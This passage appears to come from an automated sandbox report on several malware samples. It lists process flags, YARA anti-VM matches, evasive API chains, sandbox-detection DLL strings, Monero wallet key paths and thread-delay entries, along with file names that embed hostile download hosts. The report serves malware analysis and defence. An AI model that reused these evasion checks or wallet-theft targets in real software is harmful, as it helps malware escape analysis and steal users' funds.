Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\sysvplervcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.f08ae0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.f08ae0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6916, type: MEMORYSTR

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Code function: 4_2_0040D770

4_2_0040D770

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_4-4451
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_4-4451

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe, MSBuild.exe	Binary or memory string: DIR_WATCH.DLL
Source: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe, MSBuild.exe	Binary or memory string: SBIEDLL.DLL
Source: bomb.exe, 00000000.00000002.2651263420.0000013430BAE000.00000004.00000800.00020000.00000000.sdmp, bomb.exe, 00000000.00000002.2651263420.00000134313C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HTTP://185.216.68.62/X64DBG.EXE
Source: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe, MSBuild.exe	Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4216:07:4216:07:4216:07:4216:07:4216:07:42DELAYS.TMP%S%SNTDLL.DLL

Source: C:\Users\user\Desktop\bomb.exe	Memory allocated: 1342DC50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Memory allocated: 13447750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory allocated: 25D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory allocated: 2740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory allocated: 4740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Memory allocated: D70000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Memory allocated: 28B0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Memory allocated: 26B0000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

8_2_0040180D

Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599032	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598838	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598725	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598605	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598388	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598044	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597862	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597719	Jump to behavior
